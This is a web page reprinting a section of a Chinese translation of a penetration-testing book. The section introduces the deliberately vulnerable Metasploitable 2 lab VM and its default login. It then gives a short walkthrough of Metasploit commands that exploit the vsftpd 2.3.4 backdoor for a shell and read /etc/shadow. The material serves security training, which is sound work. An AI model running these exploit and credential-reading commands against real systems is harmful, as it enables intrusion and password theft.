|
|
|
|
移动端

1.6.1 Metasploitable 2

《黑客秘笈——渗透测试实用指南(第2版)》第1章赛前准备——安装,本章介绍的内容主要是帮助搭建一个标准的测试平台。您要具有扎实的PowerShell语言基础,并且能够理解二进制漏洞利用的基本原理。本节为大家介绍Metasploitable 2。

作者:孙勇 译来源:人民邮电出版社|2017-09-06 20:48

有奖调研 | 1TB硬盘等你拿 AI+区块链的发展趋势及应用调研


1.6 学习

阅读本书的人员需要初步掌握Nmap、Metasploit、Cain and Abel和aircrack等工具使用原理。您最好对Python/Ruby等高级语言以及缓冲区溢出等攻击方法有简单的了解。如果想快速提升能力或者需要开展渗透测试工作,下面是准备的工具包。

1.6.1 Metasploitable 2

我收到的一个评论是,本书第1版中没有介绍初学者如何使用Metasploit或者使用Metasploit功能测试漏洞的相关内容。这就是在本书中介绍Metasploit 2的原因,Metasploit 2是一个很棒的测试平台。在开始前,需要下载安装Metasploitable 2环境的VMWare镜像。

下载地址为http://sourceforge.net/projects/metasploitable/files/ Metasploitable2/

下载Metasploitable 2软件后,解压软件,并在VMware Player或者Virtual Box虚拟机中打开软件,输入用户名msfadmin和密码msfadmin登录软件。现在运行VM镜像文件。

试验环境

开始运行Nmap、Masscan或者其他漏洞工具,测试存在漏洞的虚拟机。一旦发现系统漏洞,就运行漏洞利用程序获取一个shell。举个例子,我们发现并且将利用vsftpd存在的缺陷。因此,可以搜索漏洞(搜索vsftpd,见图1.4)或者直接运行漏洞利用程序。

msfconsole

use exploit/unix/ftp/vsftpd_234_backdoor(选择漏洞)

show options(显示配置选项)

set RHOST [IP](设置Metasploitable 2 IP)

exploit(运行漏洞)

成功利用这个漏洞,读取存储的密码:cat /etc/shadow。为了深入研究Metasploitable 2,请阅读Rapid7指南,地址为https://community.rapid7.com/docs/DOC-1875

这个虚拟机包括很多不同类型漏洞。您要花费时间学习如何有效使用Metasploit和Meterpreter。如果想深入了解Metasploit,推荐访问http://www.amazon.com/Metasploit-The-Penetration-Testers-Guide/dp/159327288X

喜欢的朋友可以添加我们的微信账号:

【责任编辑:book TEL:(010)68476606】

回书目   上一节   下一节
点赞 0
分享:
大家都在看
猜你喜欢

读 书 +更多

C# 2005 & .NET 3.0高级编程(第5版)

该书为C#经典名著!是Wrox红皮书中最畅销的品种之一。从第1版开始就名满天下;其第3版被评选为2005年最权威的十大IT图书之一;并荣获“2005...

订阅51CTO邮刊

点击这里查看样刊

订阅51CTO邮刊